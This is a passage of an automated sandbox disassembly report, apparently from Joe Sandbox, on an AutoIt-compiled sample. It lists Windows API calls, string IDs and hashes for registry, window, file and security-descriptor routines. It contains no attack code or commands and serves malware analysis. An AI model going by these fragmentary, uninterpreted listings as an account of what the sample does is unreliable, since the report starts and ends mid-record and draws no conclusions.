                                    • RegCloseKey.ADVAPI32(00000000), ref: 00193BA1
                                    Strings
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 1a73963fd2ac9e335adb26e60c2a1c362a2c888973b43bf90b45146ce52280c9
                                    • Instruction ID: 9419fed8ebcaa4aebd598afe09c647237c699ad2a853cf810f833b42eb438f9c
                                    • Opcode Fuzzy Hash: 1a73963fd2ac9e335adb26e60c2a1c362a2c888973b43bf90b45146ce52280c9
                                    • Instruction Fuzzy Hash: 430278756046019FCB14EF24C895A2EB7E5FF99720F04855DF99A9B3A2CB30ED41CB82
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00196C56
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00196D16
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 3974292440-719923060
                                    • Opcode ID: ad16de5f84a9aa78c128306cb92e4ef169f716f03a3043d2ed9153542a6d779a
                                    • Instruction ID: 43a6cb1d9d854e6d138d6dcc5e9e7df2f5d1a3ed23a09094161172d685054cea
                                    • Opcode Fuzzy Hash: ad16de5f84a9aa78c128306cb92e4ef169f716f03a3043d2ed9153542a6d779a
                                    • Instruction Fuzzy Hash: 65A181306043419FCB18EF20D991A6EB3E5BF65314F11496DB8AAAB3D2DB30ED05CB61
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0016CF91
                                    • __swprintf.LIBCMT ref: 0016D032
                                    • _wcscmp.LIBCMT ref: 0016D045
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0016D09A
                                    • _wcscmp.LIBCMT ref: 0016D0D6
                                    • GetClassNameW.USER32(?,?,00000400), ref: 0016D10D
                                    • GetDlgCtrlID.USER32(?), ref: 0016D15F
                                    • GetWindowRect.USER32(?,?), ref: 0016D195
                                    • GetParent.USER32(?), ref: 0016D1B3
                                    • ScreenToClient.USER32(00000000), ref: 0016D1BA
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0016D234
                                    • _wcscmp.LIBCMT ref: 0016D248
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0016D26E
                                    • _wcscmp.LIBCMT ref: 0016D282
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                    • String ID: %s%u
                                    • API String ID: 3119225716-679674701
                                    • Opcode ID: b0ee9644f9815f7946eabc8f7481dc53a37290d6962b4e82419aef789ee6a0e7
                                    • Instruction ID: 46d3861e84ab778fb869359f6369e4929755d75631aa1ffc4a0423a3de97f341
                                    • Opcode Fuzzy Hash: b0ee9644f9815f7946eabc8f7481dc53a37290d6962b4e82419aef789ee6a0e7
                                    • Instruction Fuzzy Hash: 8FA1E271A04302AFC719DF64DC94FEAB7A8FF54354F008619F9A9D2180EB30E965CB91
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0016D8EB
                                    • _wcscmp.LIBCMT ref: 0016D8FC
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0016D924
                                    • CharUpperBuffW.USER32(?,00000000), ref: 0016D941
                                    • _wcscmp.LIBCMT ref: 0016D95F
                                    • _wcsstr.LIBCMT ref: 0016D970
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0016D9A8
                                    • _wcscmp.LIBCMT ref: 0016D9B8
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0016D9DF
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0016DA28
                                    • _wcscmp.LIBCMT ref: 0016DA38
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0016DA60
                                    • GetWindowRect.USER32(00000004,?), ref: 0016DAC9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: 849b2a7a5e150ff9ad1f077add3ce6beca0fb9d21bd4ae44f39866b7d1be1224
                                    • Instruction ID: 94860e244bfc40e82f3c607daa08c42596915c9bdeb0178e071128bbc75c612d
                                    • Opcode Fuzzy Hash: 849b2a7a5e150ff9ad1f077add3ce6beca0fb9d21bd4ae44f39866b7d1be1224
                                    • Instruction Fuzzy Hash: C881D0316083059FDB05CF50EC81FAA7BE8EF84318F04846AFD899A096EB30DD55CBA1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: 84e87ef73dd1e230dd81b7599478d6abc1cbcff177734b3fe18beefbc26b7d46
                                    • Instruction ID: a18aa20b0c664e5c52c501297a479ca8d337e8365bd81dbddaccbfb9fd1dc2a6
                                    • Opcode Fuzzy Hash: 84e87ef73dd1e230dd81b7599478d6abc1cbcff177734b3fe18beefbc26b7d46
                                    • Instruction Fuzzy Hash: 4031B031A44649E6DB14EA51ED63EEDB3BD9F30715F300029F851720D5EB61AE18C652
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 0016EAB0
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0016EAC2
                                    • SetWindowTextW.USER32(?,?), ref: 0016EAD9
                                    • GetDlgItem.USER32(?,000003EA), ref: 0016EAEE
                                    • SetWindowTextW.USER32(00000000,?), ref: 0016EAF4
                                    • GetDlgItem.USER32(?,000003E9), ref: 0016EB04
                                    • SetWindowTextW.USER32(00000000,?), ref: 0016EB0A
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0016EB2B
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0016EB45
                                    • GetWindowRect.USER32(?,?), ref: 0016EB4E
                                    • SetWindowTextW.USER32(?,?), ref: 0016EBB9
                                    • GetDesktopWindow.USER32 ref: 0016EBBF
                                    • GetWindowRect.USER32(00000000), ref: 0016EBC6
                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0016EC12
                                    • GetClientRect.USER32(?,?), ref: 0016EC1F
                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0016EC44
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0016EC6F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                    • String ID:
                                    • API String ID: 3869813825-0
                                    • Opcode ID: 8d481142fd626ed2f6d3df54325713999f9ec0a05fdadaa8ea94204b7d0cbf89
                                    • Instruction ID: a2a19bd10952da104d2627cd0ee98a925720379f4d884c540e728576edc6f8c1
                                    • Opcode Fuzzy Hash: 8d481142fd626ed2f6d3df54325713999f9ec0a05fdadaa8ea94204b7d0cbf89
                                    • Instruction Fuzzy Hash: 2B513A75900709AFDB249FA8DD89F6EBBF5FF04705F004A28E686A29A0D774A954CF10
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 001879C6
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 001879D1
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 001879DC
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 001879E7
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 001879F2
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 001879FD
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00187A08
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00187A13
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00187A1E
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00187A29
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00187A34
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00187A3F
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00187A4A
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00187A55
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00187A60
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00187A6B
                                    • GetCursorInfo.USER32(?), ref: 00187A7B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Cursor$Load$Info
                                    • String ID:
                                    • API String ID: 2577412497-0
                                    • Opcode ID: cc19149c8027f05aea78b0e32acf8164e02093edefa4277f39aa9628321520dc
                                    • Instruction ID: 38225add1cd6145f6d0306fc387c0ff3cdbaf4da2ee47f1f2d2ad300f584abd8
                                    • Opcode Fuzzy Hash: cc19149c8027f05aea78b0e32acf8164e02093edefa4277f39aa9628321520dc
                                    • Instruction Fuzzy Hash: A63138B0D0831A6ADB10AFB68C8995FFFE8FF04750F54452AE50DE7280DB78A5008FA1
                                    APIs
                                      • Part of subcall function 0014E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0013C8B7,?,00002000,?,?,00000000,?,0013419E,?,?,?,001CDC00), ref: 0014E984
                                      • Part of subcall function 0013660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001353B1,?,?,001361FF,?,00000000,00000001,00000000), ref: 0013662F
                                    • __wsplitpath.LIBCMT ref: 0013C93E
                                      • Part of subcall function 00151DFC: __wsplitpath_helper.LIBCMT ref: 00151E3C
                                    • _wcscpy.LIBCMT ref: 0013C953
                                    • _wcscat.LIBCMT ref: 0013C968
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0013C978
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0013CABE
                                      • Part of subcall function 0013B337: _wcscpy.LIBCMT ref: 0013B36F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 2258743419-1018226102
                                    • Opcode ID: b17ff44fcd39a249cbe8083b84d9320b2e01fa9c8f8adbdb079ed9b559513ab9
                                    • Instruction ID: 5b55793159932a67a78c5fc11026fedeaaa9ec37e88e6bf5863a0b6120aa51d0
                                    • Opcode Fuzzy Hash: b17ff44fcd39a249cbe8083b84d9320b2e01fa9c8f8adbdb079ed9b559513ab9
                                    • Instruction Fuzzy Hash: 4112A1715083419FC724EF24C881AAFBBF5BFA9344F44491EF599A3261DB30DA49CB92
                                    APIs
                                    • _memset.LIBCMT ref: 0019CEFB
                                    • DestroyWindow.USER32(?,?), ref: 0019CF73
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0019CFF4
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0019D016
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0019D025
                                    • DestroyWindow.USER32(?), ref: 0019D042
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00130000,00000000), ref: 0019D075
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0019D094
                                    • GetDesktopWindow.USER32 ref: 0019D0A9
                                    • GetWindowRect.USER32(00000000), ref: 0019D0B0
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0019D0C2
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0019D0DA
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 3877571568-3619404913
                                    • Opcode ID: 2fb2aa1de65c91f6e3fd9f84457ec958b3960a99234396ec67e3ea86f0a0e1db
                                    • Instruction ID: f35faa6f565d8dbe252123fe33f5c57e54458952abce30ebda8041042ccec08b
                                    • Opcode Fuzzy Hash: 2fb2aa1de65c91f6e3fd9f84457ec958b3960a99234396ec67e3ea86f0a0e1db
                                    • Instruction Fuzzy Hash: 8371BEB4140305AFDB24CF28EC85FB677E5EB88714F18451DF985972A1EB70E982CB22
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 0017AB3D
                                    • VariantCopy.OLEAUT32(?,?), ref: 0017AB46
                                    • VariantClear.OLEAUT32(?), ref: 0017AB52
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0017AC40
                                    • __swprintf.LIBCMT ref: 0017AC70
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0017AC9C
                                    • VariantInit.OLEAUT32(?), ref: 0017AD4D
                                    • SysFreeString.OLEAUT32(00000016), ref: 0017ADDF
                                    • VariantClear.OLEAUT32(?), ref: 0017AE35
                                    • VariantClear.OLEAUT32(?), ref: 0017AE44
                                    • VariantInit.OLEAUT32(00000000), ref: 0017AE80
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 3730832054-3931177956
                                    • Opcode ID: e7ac66fb119c499acc20b81778aba96246f2b80fc0d2d9843b690a2ccc6f1b4e
                                    • Instruction ID: 2a6c8083c12ef76d9493f4ec1ad23228b3a96bbdbf98b26a595e116872269a55
                                    • Opcode Fuzzy Hash: e7ac66fb119c499acc20b81778aba96246f2b80fc0d2d9843b690a2ccc6f1b4e
                                    • Instruction Fuzzy Hash: 30D11431A04205EBCB289FA5D884B6EB7B5FF84710F55C459F40D9B190DB70EC84DBA2
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 001971FC
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00197247
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: 44cd6b901b1ec4035f35b954b7e49980a793548537fe78b65f5f52ee4d86f1f6
                                    • Instruction ID: 67917d5202157afb8d17698119ffdd03fe035908b7d05d0e4890034f441d60c8
                                    • Opcode Fuzzy Hash: 44cd6b901b1ec4035f35b954b7e49980a793548537fe78b65f5f52ee4d86f1f6
                                    • Instruction Fuzzy Hash: 9F9160746147019BCB04EF20C891A6EB7A1BFA4314F01485DF89A6B3E3DB70ED46CB91
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0019E5AB
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0019BEAF), ref: 0019E607
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0019E647
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0019E68C
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0019E6C3
                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0019BEAF), ref: 0019E6CF
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0019E6DF
                                    • DestroyCursor.USER32(?), ref: 0019E6EE
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0019E70B
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0019E717
                                      • Part of subcall function 00150FA7: __wcsicmp_l.LIBCMT ref: 00151030
                                    Similarity
                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 3907162815-1154884017
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • CharLowerBuffW.USER32(?,?), ref: 0017D292
                                    • GetDriveTypeW.KERNEL32 ref: 0017D2DF
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0017D327
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0017D35E
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0017D38C
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 1148790751-4113822522
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,001A3973,00000016,0000138C,00000016,?,00000016,001CDDB4,00000000,?), ref: 001726F1
                                    • LoadStringW.USER32(00000000,?,001A3973,00000016), ref: 001726FA
                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,001A3973,00000016,0000138C,00000016,?,00000016,001CDDB4,00000000,?,00000016), ref: 0017271C
                                    • LoadStringW.USER32(00000000,?,001A3973,00000016), ref: 0017271F
                                    • __swprintf.LIBCMT ref: 0017276F
                                    • __swprintf.LIBCMT ref: 00172780
                                    • _wprintf.LIBCMT ref: 00172829
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00172840
                                    Similarity
                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 618562835-2268648507
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0017D0D8
                                    • __swprintf.LIBCMT ref: 0017D0FA
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0017D137
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0017D15C
                                    • _memset.LIBCMT ref: 0017D17B
                                    • _wcsncpy.LIBCMT ref: 0017D1B7
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0017D1EC
                                    • CloseHandle.KERNEL32(00000000), ref: 0017D1F7
                                    • RemoveDirectoryW.KERNEL32(?), ref: 0017D200
                                    • CloseHandle.KERNEL32(00000000), ref: 0017D20A
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0019BEF4,?,?), ref: 0019E754
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E76B
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E776
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E783
                                    • GlobalLock.KERNEL32(00000000), ref: 0019E78C
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E79B
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0019E7A4
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E7AB
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0019E7BC
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,001BD9BC,?), ref: 0019E7D5
                                    • GlobalFree.KERNEL32(00000000), ref: 0019E7E5
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0019E809
                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0019E834
                                    • DeleteObject.GDI32(00000000), ref: 0019E85C
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0019E872
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 0018076F
                                    • _wcscat.LIBCMT ref: 00180787
                                    • _wcscat.LIBCMT ref: 00180799
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001807AE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001807C2
                                    • GetFileAttributesW.KERNEL32(?), ref: 001807DA
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 001807F4
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00180806
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                    • String ID: *.*
                                    • API String ID: 34673085-438819550
                                    APIs
                                      • Part of subcall function 0016ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0016ABD7
                                      • Part of subcall function 0016ABBB: GetLastError.KERNEL32(?,0016A69F,?,?,?), ref: 0016ABE1
                                      • Part of subcall function 0016ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0016A69F,?,?,?), ref: 0016ABF0
                                      • Part of subcall function 0016ABBB: RtlAllocateHeap.NTDLL(00000000,?,0016A69F), ref: 0016ABF7
                                      • Part of subcall function 0016ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0016AC0E
                                      • Part of subcall function 0016AC56: GetProcessHeap.KERNEL32(00000008,0016A6B5,00000000,00000000,?,0016A6B5,?), ref: 0016AC62
                                      • Part of subcall function 0016AC56: RtlAllocateHeap.NTDLL(00000000,?,0016A6B5), ref: 0016AC69
                                      • Part of subcall function 0016AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0016A6B5,?), ref: 0016AC7A
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0016A8CB
                                    • _memset.LIBCMT ref: 0016A8E0
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0016A8FF
                                    • GetLengthSid.ADVAPI32(?), ref: 0016A910
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0016A94D
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0016A969
                                    • GetLengthSid.ADVAPI32(?), ref: 0016A986
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0016A995
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0016A99C
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0016A9BD
                                    • CopySid.ADVAPI32(00000000), ref: 0016A9C4
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0016A9F5
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0016AA1B
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0016AA2F
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    APIs
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 2889450990-2391861430
                                    APIs
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 2889450990-3420473620
                                    APIs
                                    • _memset.LIBCMT ref: 001755D7
                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00175664
                                    • GetMenuItemCount.USER32(001F1708), ref: 001756ED
                                    • DeleteMenu.USER32(001F1708,00000005,00000000,000000F5,?,?), ref: 0017577D
                                    • DeleteMenu.USER32(001F1708,00000004,00000000), ref: 00175785
                                    • DeleteMenu.USER32(001F1708,00000006,00000000), ref: 0017578D
                                    • DeleteMenu.USER32(001F1708,00000003,00000000), ref: 00175795
                                    • GetMenuItemCount.USER32(001F1708), ref: 0017579D
                                    • SetMenuItemInfoW.USER32(001F1708,00000004,00000000,00000030), ref: 001757D3
                                    • GetCursorPos.USER32(?), ref: 001757DD
                                    • SetForegroundWindow.USER32(00000000), ref: 001757E6
                                    • TrackPopupMenuEx.USER32(001F1708,00000000,?,00000000,00000000,00000000), ref: 001757F9
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00175805
                                    Similarity
                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 3993528054-0
                                    • Opcode ID: 1e448885b5875ba4243aa8364ea97a87c4903efc2dc10395cee5d17f1bb434a9
                                    • Instruction ID: 9c15917133c86c76e52d138c05b57d672f82c4d596771d22f89e2862ce4c1826
                                    • Opcode Fuzzy Hash: 1e448885b5875ba4243aa8364ea97a87c4903efc2dc10395cee5d17f1bb434a9
                                    • Instruction Fuzzy Hash: 7B710070640A05BFEB249B55DC49FAABF76FF00368F648209F51DAA1E0C7B16C50CB94
                                    APIs
                                    • _memset.LIBCMT ref: 0016A1DC
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0016A211
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0016A22D
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0016A249
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0016A273
                                    • CLSIDFromString.COMBASE(?,?), ref: 0016A29B
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0016A2A6
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0016A2AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 1687751970-22481851
                                    • Opcode ID: be729d350ae96eb2f6a8e7a6d561c2cbe9118c0b2352fe30dce5ff0566211ff5
                                    • Instruction ID: 5a61d2d1cd8d579070a86dce3fdc9f0b415c89d91eb99d7671beda6332e15e3c
                                    • Opcode Fuzzy Hash: be729d350ae96eb2f6a8e7a6d561c2cbe9118c0b2352fe30dce5ff0566211ff5
                                    • Instruction Fuzzy Hash: 16410476C10229ABCB25EBA4EC95DEEB7B8BF18740F404169F901B3161EB709E55CF90
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
